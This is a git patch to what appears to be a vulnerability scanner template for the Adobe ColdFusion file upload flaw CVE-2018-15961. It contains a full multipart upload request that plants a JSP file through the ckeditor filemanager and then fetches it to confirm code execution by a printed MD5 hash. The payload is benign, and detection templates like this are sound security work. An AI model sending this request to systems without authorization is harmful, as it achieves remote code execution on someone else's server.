From 33a733d4f63f90a722cf3b0ef69de12bdacf977e Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Thu, 11 Nov 2021 15:05:31 +0530
Subject: [PATCH] misc updates

---
 cves/2018/CVE-2018-15961.yaml | 36 +++++++++++++++++++++++++----------
 1 file changed, 26 insertions(+), 10 deletions(-)

diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml
index 15dd4b5ea2..3055bdfd6f 100644
--- a/cves/2018/CVE-2018-15961.yaml
+++ b/cves/2018/CVE-2018-15961.yaml
@@ -1,13 +1,14 @@
 id: CVE-2018-15961
 
 info:
-  name: CVE-2018-15961
+  name: Adobe ColdFusion Unrestricted file upload RCE
   author: SkyLark-Lab,ImNightmaree
   severity: critical
+  description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
   reference:
-    - https://github.com/vah13/CVE-2018-15961
-    - https://www.cvedetails.com/cve/CVE-2018-15961/
-  tags: adobe,cve,cve2018,rce,coldfusion,fileupload
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-15961
+    - https://github.com/xbufu/CVE-2018-15961
+  tags: cve,cve2018,adobe,rce,coldfusion,fileupload
 
 requests:
   - raw:
@@ -20,24 +21,39 @@ requests:
         Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
         Content-Type: image/jpeg
 
-        <%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%>
+        <%@ page import="java.util.*,java.io.*"%>
+        <%@ page import="java.security.MessageDigest"%>
+        <%
+        String cve = "CVE-2018-15961";
+        MessageDigest alg = MessageDigest.getInstance("MD5");
+        alg.reset();
+        alg.update(cve.getBytes());
+        byte[] digest = alg.digest();
+        StringBuffer hashedpasswd = new StringBuffer();
+        String hx;
+        for (int i=0;i<digest.length;i++){
+          hx =  Integer.toHexString(0xFF & digest[i]);
+          if(hx.length() == 1){hx = "0" + hx;}
+          hashedpasswd.append(hx);
+        }
+        out.println(hashedpasswd.toString());
+        %>
         -----------------------------24464570528145
         Content-Disposition: form-data; name="path"
 
         {{randstr}}.jsp
         -----------------------------24464570528145--
 
-  - method: GET
-    path:
-      - "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"
+      - |
+        GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
 
       - type: word
-        part: body
         words:
-          - "18188751"
+          - "ddbb3e76f92e78c445c8ecb392beb225"  # MD5 of CVE-2018-15961
 
       - type: status
         status: